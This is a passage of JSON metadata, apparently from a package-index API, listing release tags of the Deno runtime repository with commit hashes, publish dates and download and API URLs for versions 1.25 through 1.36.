8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","dow